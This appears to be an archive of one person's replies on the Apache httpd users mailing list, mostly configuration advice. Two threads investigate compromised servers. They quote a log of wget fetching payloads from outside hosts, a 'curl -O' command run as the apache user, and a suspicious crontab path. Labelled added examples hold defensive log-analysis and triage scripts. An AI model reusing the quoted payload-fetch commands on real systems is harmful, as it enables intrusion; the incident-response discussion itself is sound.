Re: [users@httpd] Proxy for TLS connection

2011-08-02 Thread Jeroen Geilman

On 2011-08-02 23:17, Ruiyuan Jiang wrote:

Do not hijack other people's threads or topics. Just start your own.


Hi, I have an Apache reverse proxy server for both multiple http and https 
connection setup (v2.2.19).



Right now there is a request to proxy TLS connection which is not on port 443. 
Can the Apache reverse proxy server accomplish that? Thanks.


Why would the port matter?



Ruiyuan



This message (including any attachments) is intended
solely for the specific individual(s) or entity(ies) named
above, and may contain legally privileged and
confidential information. If you are not the intended
recipient, please notify the sender immediately by
replying to this message and then delete it.
Any disclosure, copying, or distribution of this message,
or the taking of any action based on it, by other than the
intended recipient, is strictly prohibited.


I hereby violate everything you state and keep the message to sell to 
the russians for lotsamonies.



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org



Re: [users@httpd] https redirection

2011-08-04 Thread Jeroen Geilman

On 2011-08-04 11:35, Ashwin Kesavan wrote:

Jeroen Geilman wrote:

On 2011-07-30 08:28, vishesh kumar wrote:

Hi Members

Suppose I have a site https://abc.com and I want that if anyone writes 
https://abc.com/xyz.com, it should be redirected to https://xyz.com, 
which is on the same server.


Redirect Permanent /xyz.com/ https://xyz.com/

Server-wide certificate installed on server.


No.
If the domains hosted on this server are not in the same parent zone 
(as you have just shown) you cannot use one certificate for both 
domains.




Look at the mod_rewrite and the directive RedirectPermanent in httpd 
documentation to know how to use the above two to achieve the 
objective you want. It is pretty simple and straightforward. I have 
done that many times myself. I want you to learn that instead of 
spoon feeding you. Look up the above two keywords in the httpd doc site 
and you will have all that is required to do it. Please have the 
habit of searching on any search engine like google for example to 
know how to do something before asking here. Ask only if that didn't 
help. Please read up "how to ask smart questions" by esr on the internet 
and enlighten yourself.


HTH



And you're telling me this because ?

--
J.





Re: [users@httpd] Chrome 300 Problem

2011-08-06 Thread Jeroen Geilman

On 2011-08-06 20:17, Michael D. Berger wrote:

Running:
# rpm -q httpd
httpd-2.2.3-31.el5.centos.4
On:
# uname -a
Linux mbrc20 2.6.18-164.15.1.el5 #1 SMP Wed Mar 17 11:37:14 EDT 2010 i686
athlon i386 GNU/Linux

Accessing a directory:
www.myplace.net/here/there/
where both "here" and "there" require httpd access, while
www.myplace.net/ does not,

Using Chrome, the user gets a "300 Multiple Choices" response,
(with no choices offered) while when using Firefox, there is
no problem, and a proper login is requested.

I note that the directory "there" contains numerous subdirectories,
but only one other file: there/there.html .


http://httpd.apache.org/docs/current/content-negotiation.html



Any suggestions?
Thanks,
Mike.






--
J.






Re: [users@httpd] Forwarding request to internal server

2011-08-12 Thread Jeroen Geilman

On 2011-08-12 02:42, Ahmad Pakhri Yahya wrote:


Hi,



Hi, don't hijack other people's threads.

I'm new to apache. I'm trying to forward requests from a server located 
in DMZ serving requests from external IP to a tomcat server residing 
inside an internal network. How do I setup my apache/httpd config so 
that the request would go to the internal IP.


I would also, if possible, forward to multiple servers internally 
running the same application. Like a load balancer service, which 
serves external requests to multiple internal tomcat servers.


I would appreciate if someone can show me how to setup the environment on 
the external/DMZ server so that all requests will go to the multiple 
internal servers.


 
       External/dmz server
                |
               / \
              /   \
       Tomcat 1   Tomcat2




Look at mod_proxy_balancer.

It can do everything you want.


--
J.



Re: [users@httpd] Modular .htaccess files

2011-08-15 Thread Jeroen Geilman

On 2011-08-15 12:34, lists.sebast...@abwesend.de wrote:

Hi,

I have an idea on .htaccess files or rather a tiny feature request. :) Before I post it 
to the bugzilla system as a "real" feature request, I wanted to put the idea up 
for discussion. ;) By the way, Apache is a really great piece of software and I like to 
use it! ;)

But first of all one more thing: Yes, I know that .htaccess is only the second best 
alternative and people should rather use httpd.conf BUT in my opinion there are reasons 
"pro" .htaccess (for example, if you can't change the server configuration).


That is the only reason.


IDEA: It would be a great thing if one could cascade/include .htaccess files 
(Include .htaccess-2) or make Apache parse more than one .htaccess file per 
directory (.htaccess-botrestriction, .htaccess-legacyurlrewrite, ...). A 
modular approach for .htaccess files could provide an increased flexibility and 
an improved manageability.


And it would dump your performance even further down the toilet.


Scenario 1:
---
You have big .htaccess files containing anti-bot ip restrictions, legacy URL 
rewrite rules, SEO URL rewrite rules etc.


That would be unwise. Global IP restrictions are under the purview of 
the administrator and should really go in httpd.conf, or be enforced by 
a firewall.
I furthermore suspect you have no idea what an "anti-bot IP restriction" 
actually means, since your professed goal - to get noticed by search 
engines - requires you to very much let bots access your web site.



- Restrict certain IP ranges from accessing your folders/forum/blog/whatever. 
This can be done through .htaccess.


But should be done in httpd.conf whenever possible.


- "Cool URIs don't change" [1]. We all know that. But sometimes you have to change your 
directory structure (e.g. new CMS software) and then it's good to keep the old addresses working 
through "HTTP/301 Moved Permanently" forwardings. This can be done through .htaccess.


But should be done in httpd.conf whenever possible.


- Everybody seems to love SEO URLs. Users and decision makers demand them, 
although there are people who say there's no use in using them.



So if you want to meet the demand, you need to offer these 
/products/my-product-123.html addresses. This can be done through .htaccess.


But should not be done at all.


If one puts all these things into one big file, it can become confusing and 
hard to maintain. It would be easier to keep track of these things if you could 
do something like this:

[Content of .htaccess]
# Some common directives ...
# ...
# Include more .htaccess files:
Include .htaccess-botrestrictions
Include .htaccess-keepalivelegacyurls
Include .htaccess-fancyseourls


httpd.conf fully supports this.


Scenario 2:
---
You develop some web applications locally (local LAMP server/developer machine) 
and often deploy the changes made to your productive environment (virtual 
server on the net, cloud hosting, dedicated server, ...). I have a few of these 
projects and the project files are the same online and offline, apart from one 
config.inc.php (database configuration, paths etc.) and the .htaccess file. I 
exclude the server-specific config.inc.php from synchronizing. So I can just 
upload all the other files without problems (WinSCP or sth. like this). ALL the 
other files? No, there's one file that needs to be merged manually!! :D It's 
the .htaccess file. I can't just overwrite the version on the production server 
with my local file version because there are few lines that need to be 
different. So I have to edit this file manually and be very very careful not to 
put in the local (==wrong) paths on the server.
It would make things much easier, if you could keep more than one .htaccess file. I 
could use one .htaccess-serverspecific, which could be excluded from sync, and one 
.htaccess-common, which could be overwritten (local dev machine -> web 
server) airly.


And it would be even more easy when you put the static configuration in 
httpd.conf, and ONLY put the configuration in htaccess files that you 
KNOW should be applied to one or the other disparate environments.
This enables you to keep the DEV and PROD htaccess files clean and 
understandable - each applies only to its own environment.


In fact, if you combine the above comment with this requirement, one 
might posit that the best solution is to maintain different Include 
files for DEV and PROD, and not to bother with htaccess at all.


Re-creating the entire "config" through htaccess files is just stupid.



These are only two ideas on how these features could be useful to users.


My 2 ideas on how to do that:
---
1) Allow Include in context .htaccess. See [2].
2) Allow Apache to read more than one .htaccess files per directory (e.g. all 
files with a certain prefix, for example .htaccess-([a-z]+) )


Do you think there might be a chance to suggest this topic to the developers? 
At least *I* would like to have these feature[s] in Apache h

Re: [users@httpd] Modular .htaccess files

2011-08-15 Thread Jeroen Geilman

On 2011-08-15 16:37, Pete Houston wrote:

On Mon, Aug 15, 2011 at 10:16:29AM -0400, Ben Timby wrote:

In the above way, the administrator could delegate control of portions
of the configuration to a user without the overhead of an .htaccess
file. Also, you could include a file which in turn includes other
files. Thus, the administrator could delegate via httpd.conf a config
file to the user which in turn could delegate to a set of files. This
would give you localized management in a set of files.

There are two problems with this which I can see.

Firstly, from the web server manager's point of view this is a bad idea,
because all it would take would be for the user to construct a conf file
with a syntax error and the whole server is taken down. Too much of a
risk on a shared server.

Secondly, from the user's point of view, they make their change to the
conf file, but it will only become active when the server is restarted
to pick up the changes, so probably daily or worse weekly. With a
.htaccess file the changes are instantaneous.


True, as far as it goes.

However, while there is no way to limit what an Include file contains, 
you can restrict what users are allowed to put in htaccess files.
This coincides with what you're describing in that changes to Include 
files should be tested before restarting apache with apachectl 
configtest, and disabling or (re)moving offending Include files.

This would be the responsibility of the server admin.
The use of htaccess files can be quite wide-ranging but it doesn't have 
to be, and the depth of manipulation the OP wanted to achieve is best 
split up between these two mechanisms.


Moreover, he obviously wasn't allowing end-users to manipulate htaccess 
files at all, as he explicitly stated this was a fix for an 
"inconvenience" in configuration differences between development and 
production.
Both of these are the server admin's responsibility, and one assumes 
that the server admin is paying attention when deploying new 
configurations to production.




So, while it's nice in theory, there are practicalities which mean that
it is unlikely to happen in a shared server scenario.


In a shared HOSTING environment, you're absolutely correct.
The OP's stated goal had nothing to do with shared hosting, although he 
generalized the request to extend that far.


Perhaps I should have made more plain that I am in no way claiming this 
feature - or any feature - should not be implemented, or discussed; I am 
not an apache developer so I wouldn't have much to say about it one way 
or the other.
That's not at all my point - my point was that HIS goal does not need 
any kind of new feature implementation.


--
J.





Re: [users@httpd] Proxy´ing a remote site

2011-08-16 Thread Jeroen Geilman

On 2011-08-16 09:23, Søren Schimkat wrote:

Hi Guys

I would like to make a remote website appear as existing on a local 
virtual host, but I'm having trouble with understanding how to do it. 
Virtual hosting is working just fine, but getting the remote site into 
the local space is just killing me.


What I need to do is to have www.remote.com appear as www.local.com.


mod_proxy_http will do this just fine.

Configure ProxyPass and ProxyPassReverse as documented.

The remote site contains some fully qualified links and references to 
images like this: <a href="http://www.remote.com/somestuf/page2.htm" 
title="Page 2"><img src="http://www.remote.com/images/page2.gif"></a> 
..  that would need to be rewritten.


That is not possible with mod_proxy.

There is a third-party module that does just that however: mod_proxy_html.

You can find it here: http://apache.webthing.com/mod_proxy_html/



--
J.





Re: [users@httpd] RE: KeepAlive setting under heavy load

2011-08-17 Thread Jeroen Geilman

On 2011-08-17 16:55, Pratte, Gil wrote:


I left out one detail - Apache HTTP is only being used as a reverse proxy.



Then you want keepalive on and set high.
Persistent connections to your backend are obviously beneficial.

This depends on how many backend servers you have, but even with, say, 
20 servers, and the default of 256 threads, this means you have 12 
persistent connections per backend server.
If the distribution is not equal(-ish), or worse, random, this will 
backfire.



I have read conflicting reports regarding the KeepAlive setting. Under 
load the website has hundreds to thousands of users logged in at any 
given time.




Web servers do not log anything in.


I am in the process of tuning it for performance under load.



You need to calculate average and burst requests per time period, and 
correlate that with your maximum client concurrency.

(You also need average time per request for this).

Enable and study server-status for detailed usage info.

My question is: Should I set KeepAlive to On or Off for a website 
under heavy load?




Too many variables.
Establish baselines, study usage patterns, and determine optimal settings.

--
J.



Re: [users@httpd] number of connection on Windows Apache

2011-08-17 Thread Jeroen Geilman

On 2011-08-17 22:51, go1...@mailnew.com wrote:

Hi, I am using Apache 2.2.17 on Windows Server. To experiment with the
limit of number of simultaneous connection, I used the directive
ThreadsPerChild set the number to 1. So I am only supposed to be able to
have one connection at a time. But I am surprised to see I can use two
curl clients to download files at the same time. I wonder how to explain
this.

The following is my setting.

 ThreadsPerChild  1



And how many children are running ?

--
J.





Re: [users@httpd] Setting KeepAlive on for forward proxy

2011-08-18 Thread Jeroen Geilman

On 2011-08-18 17:08, Edoardo Tirtarahardja wrote:

Hi,

I read from mod_proxy description in Apache 2.2 that the default worker
does not use the HTTP Keep-Alive.

Is there a way how to enable it for forward proxy configuration?


You mean, from apache working as a forward proxy to the remote origin 
server?

Can you imagine how bad that would be ?


  I tried
to set the 'keepalive' parameter in 'ProxyPass' directive it doesn't work.
I think ProxyPass is more for reverse proxy, rather than forward proxy.


As documented, ProxyPass is ONLY for reverse (i.e. known-origin) proxies.



Setting it in 'Proxy' directive also doesn't work.

Even if I can make it work, those 'ProxyPass' & 'Proxy' require an absolute
URL, while I want to enable it for ALL requests.


Um. So use /.


Please help.

BR //Edo



--
J.





Re: [users@httpd] Setting KeepAlive on for forward proxy

2011-08-18 Thread Jeroen Geilman

On 2011-08-18 18:09, Edoardo Tirtarahardja wrote:

On 2011-08-18 11:26,Jeroen Geilman wrote:

On 2011-08-18 17:08, Edoardo Tirtarahardja wrote:

Hi,

I read from mod_proxy description in Apache 2.2 that the default worker
does not use the HTTP Keep-Alive.

Is there a way how to enable it for forward proxy configuration?

You mean, from apache working as a forward proxy to the remote origin
server?
Can you imagine how bad that would be ?

Well, this is a very isolated forward proxy within a very small test
network. The reason is when I'm hitting our intranet site,



You should be using ProxyPass, as you apparently need a reverse proxy.



it returns HTTP
403 as it requires NTLM authentication. However the apache forward proxy
close the connection (TCP SYN)


FIN


  when delivering this HTTP 403 response to
the client, causing the client to immediately display the HTTP 403.

 From a computer that directly connected to our corp. LAN, I can see that
if the TCP connection is kept alive, then the browser will re-send the
request with NTLM authentication negotiation and then it works.

I'm new in apache server, but I have done quite some google search and it
seems apache does not have module to be NTLM proxy, i.e. perform NTLM
auth. on the client behalf. The module for NTLM if I understand it
correctly, is only to be used in reverse proxy or to authenticate the
windows client.


So pass on the authentication to the proxy...
ProxyPass supports this (and does it by default AFAIK)



--
J.





Re: [users@httpd] My RewriteRule seems to be ignored

2011-08-22 Thread Jeroen Geilman

On 2011-08-22 23:55, Hilco Wijbenga wrote:


You nailed it. All those Rewrite* options need to be in the virtual
host. Then it works.

This is surprising. I had assumed that anything outside of a virtual
host was a global setting and the virtual host settings overrode those
global settings where appropriate.


Except that RewriteEngine ON is NOT inherited.
It must occur anew in every vhost the global rules need to apply to.
As documented...


Can you recommend anything to read that handles such basic concepts?
The Apache docs are extensive but clearly you need to have a certain
foundation of basic Apache knowledge.


No, it's all in the official documentation.
Start at the main portal and read the various howtos and guides before 
diving into specific reference sections:


http://httpd.apache.org/docs/2.2/




--
J.





Re: [users@httpd] [mod_rewrite] How to *not* log certain rules?

2011-08-23 Thread Jeroen Geilman

On 2011-08-23 20:30, Hilco Wijbenga wrote:

Hi all,

I have Vuze (bittorrent) running which sends out /announce and /scrape
requests every 10 seconds or so. I managed to avoid logging them in
the regular logs using

SetEnvIf Request_URI "^/announce|/scrape$" do-not-log
CustomLog /var/log/apache2/access.log common env=!do-not-log

  but they still show up in my rewrite.log.


So disable the rewritelog.

It's meant for debugging purposes, not to run on a production system.

--
J.





Re: [users@httpd] Could Apache login support CAPTCHA and lockout?

2011-10-06 Thread Jeroen Geilman

On 2011-10-04 14:44, Neal Rhodes wrote:
We have bunches of web applications which use the regular Apache login 
protection, 


Do you mean HTTP Basic Auth, as defined in RFC 2616 ?


and they won't run unless REMOTE_USER is set by the Apache login.


require valid-user



require valid-user


AuthName O-Visitor
AuthUserFile /usr/appl/cgi/.htpasswd

AuthType Basic




Yes, this is HTTP Basic AUTH.
It says so right there.


Looking at improving security, it would seem that it would be much 
harder to conduct brute-force attacks on these systems if we could 
configure Apache login to do two things:


You can't.
There is no "login", just an Authorization: header which has to be sent 
for every page that requires it.



A. Present the CAPTCHA style validation prompt as part of the
login, to make it difficult for scripted attacks to proceed;
B. Lockout an individual username in the .htpasswd file after X
failed login attempts.



Actual login-ness (a state of logged in being different from a state of 
not being logged in) must be achieved through non-HTTP means, possibly 
supported by HTTP features such as cookies.



--
J.
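
Added example, not part of the original thread: because Basic auth has no login state, the lockout in point B has to be derived outside the protocol, for instance from the access log. The sketch below assumes the common log format, where the user field on a 401 line is the name the client supplied; the function names, thresholds and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common log format: host ident user [time] "request" status size
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (not taken from the thread).
SAMPLE = """\
198.51.100.20 - - [04/Oct/2011:14:40:00 +0000] "GET /cgi/app HTTP/1.1" 401 381
198.51.100.20 - alice [04/Oct/2011:14:40:05 +0000] "GET /cgi/app HTTP/1.1" 200 2048
203.0.113.50 - bob [04/Oct/2011:14:41:00 +0000] "GET /cgi/app HTTP/1.1" 401 381
203.0.113.50 - bob [04/Oct/2011:14:41:01 +0000] "GET /cgi/app HTTP/1.1" 401 381
203.0.113.51 - bob [04/Oct/2011:14:41:02 +0000] "GET /cgi/app HTTP/1.1" 401 381
203.0.113.50 - carol [04/Oct/2011:14:41:10 +0000] "GET /cgi/app HTTP/1.1" 401 381
203.0.113.50 - carol [04/Oct/2011:14:45:10 +0000] "GET /cgi/app HTTP/1.1" 401 381
""".splitlines()


def failed_logins(lines):
    """Yield (time, user, host) for 401 responses that carried a user name."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group("status") != "401":
            continue
        user = m.group("user")
        if user == "-":
            # No Authorization header was sent: this is the first,
            # unauthenticated request that makes the browser prompt.
            continue
        try:
            when = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        except ValueError:
            continue  # malformed timestamp, skip the line
        yield when, user, m.group("host")


def users_to_lock(lines, max_failures=3, window_seconds=60):
    """Return {user: time the threshold was reached}.

    Failures are counted per user name across all client addresses, within a
    sliding window, because the request in the thread was a per-user lockout.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # user -> timestamps of recent failures
    flagged = {}
    for when, user, _host in failed_logins(lines):
        q = recent[user]
        q.append(when)
        while q and when - q[0] > window:
            q.popleft()           # forget failures older than the window
        if len(q) >= max_failures and user not in flagged:
            flagged[user] = when
    return flagged


if __name__ == "__main__":
    for user, when in users_to_lock(SAMPLE).items():
        print(f"{user}: threshold reached at {when.isoformat()}")
```

What is done with a flagged name (disabling its .htpasswd entry, blocking the source addresses) is left to the operator.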



Re: [users@httpd] Apache2 sporadically not interpreting php code

2011-10-26 Thread Jeroen Geilman

On 2011-10-26 10:06, dubbelpunt wrote:

My httpdserver is sporadically not interpreting some of my php code.


Apache never, ever interprets PHP code.
You are talking about mod_php, which is a third-party module.

That said, you are also using APC and mod_python.

I suggest you look into that.


Apache version: 2.2.8


That is quite old.



--
J.





Re: [users@httpd] Possible hack attempt

2011-10-28 Thread Jeroen Geilman

On 2011-10-28 21:46, Gary Smith wrote:

I was tasked on tracking down the cause of a perl process that is hanging on a 
client server.  The server is opensuse, pretty much out of the box, patched 
pretty current.  Anyway, below is the first log entry where it looks like 
someone attempted to run a perl script.  It also appears that a file was 
somehow saved.  Since I see that there is a url in it, I figured I'd ask others 
if they have seen this attack vector recently and what resolution path I might 
take.

[Wed Sep 21 12:30:09 2011] [notice] Apache/2.2.15 (Linux/SUSE) mod_ssl/2.2.15 
OpenSSL/1.0.0 PHP/5.3.3 configured -- resuming normal operations
perl: no process found
--2011-09-22 12:58:42--  http://joytalk.byethost4.com/uau
Resolving joytalk.byethost4.com... 209.190.24.4
Connecting to joytalk.byethost4.com|209.190.24.4|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: `uau'

  0K .. .. . 185K=0.2s

2011-09-22 12:58:43 (185 KB/s) - `uau' saved [29702]

   % Total% Received % Xferd  Average Speed   TimeTime Time  Current
  Dload  Upload   Total   SpentLeft  Speed
100 297020 297020 0  73064  0 --:--:-- --:--:-- --:--:-- 91390
--2011-10-03 12:32:31--  http://91.205.74.14/.xal/.ICE-un1x
Connecting to 91.205.74.14:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29710 (29K) [text/plain]
Saving to: `.ICE-un1x'

  0K .. .. .   100% 54.4K=0.5s

2011-10-03 12:32:31 (54.4 KB/s) - `.ICE-un1x' saved [29710/29710]



So go and see what is in those files.

Since they were kind enough to timestamp the download, you can correlate 
this with the access log and see the exact exploit used.



--
J.
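
Added example, not part of the original thread: one way to do the correlation suggested above, pairing each wget timestamp in the error log with the requests logged just before it. It assumes a common or combined format access log written with the same local clock as the error log; the function names and all sample log lines are constructed.

```python
import re
from datetime import datetime, timedelta

# wget announces each download as "--YYYY-MM-DD HH:MM:SS--  URL" on stderr,
# which a process spawned by httpd inherits as the Apache error log.
WGET_RE = re.compile(r"^--(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})--\s+(\S+)")

# Common/combined log format: host ident user [time] "request" status size
ACCESS_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3})'
)

# Constructed sample data (not taken from the thread).
ERROR_LOG = """\
[Thu Sep 22 09:00:01 2011] [notice] Apache configured -- resuming normal operations
perl: no process found
--2011-09-22 12:58:42--  http://files.example.test/payload
Resolving files.example.test... 192.0.2.10
Saving to: `payload'
--2011-10-03 12:32:31--  http://192.0.2.99/second
Saving to: `second'
""".splitlines()

ACCESS_LOG = """\
198.51.100.7 - - [22/Sep/2011:12:58:30 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.9 - - [22/Sep/2011:12:58:41 +0000] "POST /app/form.php HTTP/1.1" 200 312
198.51.100.7 - - [22/Sep/2011:12:59:10 +0000] "GET /style.css HTTP/1.1" 200 900
""".splitlines()


def wget_downloads(error_log_lines):
    """Return [(start_time, url)] for every wget banner in the error log."""
    found = []
    for line in error_log_lines:
        m = WGET_RE.match(line)
        if m:
            started = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            found.append((started, m.group(2)))
    return found


def access_requests(access_log_lines):
    """Return [(time, host, request, status)]; unparseable lines are skipped."""
    parsed = []
    for line in access_log_lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        try:
            # Assumption: both logs use the server's local clock, so the UTC
            # offset is dropped and wall-clock times are compared directly.
            when = datetime.strptime(
                m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"
            ).replace(tzinfo=None)
        except ValueError:
            continue
        parsed.append((when, m.group("host"), m.group("request"), int(m.group("status"))))
    return parsed


def correlate(error_log_lines, access_log_lines, window_seconds=5):
    """For each download, list the requests logged in the seconds before it.

    The access log records when a request was received, so the request that
    started the download is stamped at or shortly before wget's own banner.
    """
    requests = access_requests(access_log_lines)
    window = timedelta(seconds=window_seconds)
    report = []
    for started, url in wget_downloads(error_log_lines):
        suspects = [r for r in requests if started - window <= r[0] <= started]
        report.append({"started": started, "url": url, "requests": suspects})
    return report


if __name__ == "__main__":
    for item in correlate(ERROR_LOG, ACCESS_LOG):
        print(item["started"], item["url"])
        for when, host, request, status in item["requests"]:
            print("   ", when, host, status, request)
        if not item["requests"]:
            print("    no request in window: widen it or check rotated logs")
```

An empty match list, as for the second constructed download, means the window is too narrow, the relevant access log has been rotated away, or the process was not started by a web request at all.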





Re: [users@httpd] apache 2.2.16 deadly slow

2011-11-11 Thread Jeroen Geilman

On 2011-11-11 06:00, J. Bakshi wrote:

On Thu, 10 Nov 2011 02:05:44 +0100
Bostjan Skufca  wrote:


Seconded:)

b.

Dear list,

To be confirmed I have installed debian squeeze on a new server having 8GB RAM
and with i5 processors. Then installed apache2, php5, mysql etc.

Have not done any tweak on any configuration  and surprisingly the apache
response is very very slow


That's so uninformative as to be useless - as can be deduced from the 
handful of guesses you received about it.


Please investigate properly and report actual facts: what does "slow" 
mean, under what conditions, what requests are done, what code is 
running, what 3rd party modules have you enabled, what does the system 
load look like when you start apache, after 10 minutes, after an hour ?


Don't expect us to do your work for you.

--
J.





Re: [users@httpd] Invalid URI in request OPTIONS * HTTP/1.0

2012-01-04 Thread Jeroen Geilman

On 01/04/2012 12:36 PM, Szőts Ákos wrote:

Hi All,

There's a frequent error message in my Apache error_log (v2.2.21 under
openSUSE 12.1):
"Invalid URI in request OPTIONS * HTTP/1.0"

I know this is an internal dummy connection to test if the server is alive
or not. But every time, Apache tries to connect to itself, it writes
instead of the error log.

Here is the full request:
OPTIONS * HTTP/1.0
User-Agent: Apache (internal dummy connection)

Response:
HTTP/1.1 400 Bad Request
Vary: accept-language,accept-charset,User-Agent
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Tue, 03 Jan 2012 19:31:04 GMT

Here is the full "debug" log:
[error] [client 194.38.104.110] Invalid URI in request OPTIONS * HTTP/1.0
[debug] mod_headers.c(756): headers: ap_headers_output_filter()
[debug] mod_headers.c(756): headers: ap_headers_output_filter()
[debug] mod_headers.c(756): headers: ap_headers_output_filter()
[debug] mod_headers.c(756): headers: ap_headers_output_filter()
[error] [client 194.38.104.110] ModSecurity: Warning. String match "Invalid
URI in request" at WEBSERVER_ERROR_LOG.

I tried to telnet to my server on port 80, and when I write "OPTIONS *", I
get a 400 error, but when I write "OPTIONS /", I got 200 OK.
RFC says the * is acceptable, so I don't understand why the error.



An internal dummy connection will originate from localhost (127.0.0.1), 
not 194.138.104.110:


[error] [client 194.38.104.110] ModSecurity: Warning. String match "Invalid 
URI in request" at WEBSERVER_ERROR_LOG.


As to the OPTIONS * request failing - make sure there are no hidden 
rewrite rules or other URI mangling going on.




--
J.





Re: [users@httpd] Invalid URI in request OPTIONS * HTTP/1.0

2012-01-06 Thread Jeroen Geilman

On 01/06/2012 10:23 AM, Szőts Ákos wrote:

No, I don't think so; ModSecurity just get triggered because something in
the error_log.

"As to the OPTIONS * request failing - make sure there are no hidden
rewrite rules or other URI mangling going on."

Thank you for the tip. Is there any (easy) way to debug which rewrite rules
were applied to a query? The server is in use, so unfortunately I cannot


Enable the rewritelog and see what it says:

RewriteLog /some/location
RewriteLogLevel 1

If RewriteLogLevel 1 does not show you what you need to see, increase it 
until you do see something, but I would advise you not to run at a high 
loglevel for long on a production system, as it will cause a massive 
performance hit.




turn on/off the rules randomly.

Ákos

On 5 January 2012 at 13:49:30, Igor Cicimov wrote:

[error] [client 194.38.104.110] ModSecurity: Warning. String match "Invalid
URI in request" at WEBSERVER_ERROR_LOG.   ModSecurity? Protection against
using * in the URI?







--
J.





Re: [users@httpd] Is it possible to redirect user to "market://..." URI?

2012-01-09 Thread Jeroen Geilman

On 2012-01-09 14:08, linux.il wrote:


On my website I should redirect Android users to my application on 
Android Market. What is the optimal way to do this? My first idea was


RewriteCond %{HTTP_USER_AGENT}  Android [NC]
RewriteRule ^/$ market://details?id=..


There is no market://details application/system/scheme on your apache 
server - this is a client-side phenomenon.
Issue a 301 Redirect to the above URL - you can put anything in a 
redirect URL.
Convert the above into an explicit redirect by appending [R=301] to the 
RewriteRule.




But it doesn't work. Is it doable in Apache?

TIA, Vitaly




--
J.



Re: [users@httpd] Is it possible to redirect user to "market://..." URI?

2012-01-10 Thread Jeroen Geilman

On 01/10/2012 09:17 AM, linux.il wrote:

On Mon, Jan 9, 2012 at 9:31 PM, Jeroen Geilman  wrote:


On 2012-01-09 14:08, linux.il wrote:

On my website I should redirect Android users to my application on Android Market. 
What is the optimal way to do this? My first idea was

   RewriteCond %{HTTP_USER_AGENT}  Android [NC]
   RewriteRule ^/$ market://details?id=..

There is no market://details application/system/scheme on your apache server - 
this is a client-side phenomenon.
Issue a 301 Redirect to the above URL - you can put anything in a redirect URL.
Convert the above into an explicit redirect by appending [R=301] to the 
RewriteRule.

Thank you for the suggestion. I replaced the 302 return code with 301, but it
didn't help - the browser tries to open some weird URL like this:
http://mysite.com/market://details?.



Perhaps mod_rewrite does not support redirecting to a different 
protocol, and assumes your target is relative and appends it to the base 
URI.

You could try to set RewriteBase to / for this scenario.


--
J.





Re: [users@httpd] attack on apache

2012-01-11 Thread Jeroen Geilman

On 01/11/2012 08:24 PM, Luisa Ester Navarro wrote:




From: luisa2...@hotmail.com
To: users@httpd.apache.org
Subject: RE: [users@httpd] attack on apache
Date: Wed, 11 Jan 2012 16:15:14 -0300



> Date: Mon, 9 Jan 2012 17:30:21 +
> From: tevans...@googlemail.com
> To: users@httpd.apache.org
> Subject: Re: FW: [users@httpd] attack on apache
>
> On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
>  wrote:
> >
> >
> > 
> >
> > I didn't have any cronjobs but when I detected the attack I saw one in
> > /var/spool/cron
> > My logfile says
> > User apache:
> >
> >/var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
> >
> >personal crontab deleted: 56 Time(s)
> >
> >personal crontab listed: 1 Time(s)
> >
> >personal crontab replaced: 1 Time(s)
> >
> > Thanks
> >
>
> Google tells me that this is output from a cpanel perl script -
> probably a crontab editor. crontabs are not evidence of an attack.
>

> You need to show more details of what you think is happening, and why
> you think it is malicious.
> Cheers
>
> Tom

I think it is an attack because I found these commands running on my 
server (with owner apache)


/usr/local/apache/bin/httpd - DSFSL
sh -c curl -O http://

I also found a folder proc in /var/named/chroot. this folder is the 
same as /proc, is updated with the original /proc and I can't delete.


That is a bind mount, and probably unrelated. It may be necessary to run 
BIND chrooted.




In /var/log/httpd/error_log I see things like this
sh: del comand no found
sh: xx Permission denied

I need help !



1. Stop apache.
2. investigate which leaky, creaky or lousy PHP script allowed this exploit.
3. remove the bad script.


--
J.



Re: [users@httpd] attack on apache

2012-01-11 Thread Jeroen Geilman

On 01/11/2012 09:10 PM, Jaco Kroon wrote:

On 11/01/12 21:35, Jeroen Geilman wrote:




In /var/log/httpd/error_log I see things like this
sh: del comand no found
sh: xx Permission denied

I need help !



1. Stop apache.
2. investigate which leaky, creaky or lousy PHP script allowed this 
exploit.

3. remove the bad script.
4.  Remount /tmp with noexec,nosuid,nodev to prevent the majority of 
these types of exploits.


Surely you noticed that I did not advise him to turn it back on - at all 
? ;)

But yes, distros that don't protect /tmp suck.


--
J.
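
The signs reported in this thread (a crontab for the apache account, shell errors in error_log, non-httpd processes owned by apache) and the /tmp mount advice can be checked with a few read-only helpers. This is an added example, not code from any poster; the function names and all sample data are constructed, and each helper reads a saved file so it can be pointed at copies taken from the affected host.

```shell
#!/bin/sh
# Added example: read-only triage helpers for the signs discussed above.
# Function names and sample data are constructed for illustration.

# Crontab lines whose command lives in a world-writable directory.
# $1 = crontab file, e.g. a copy of the apache user's file in /var/spool/cron
suspicious_cron_lines() {
    grep -v '^[[:space:]]*#' "$1" |
        grep -E '(^|[[:space:]])/(tmp|var/tmp|dev/shm)/' || true
}

# Number of raw shell diagnostics ("sh: ...") in an error_log. Processes
# spawned by httpd inherit its stderr, so their complaints land in this file.
shell_noise_count() {
    grep -c '^sh: ' "$1" || true
}

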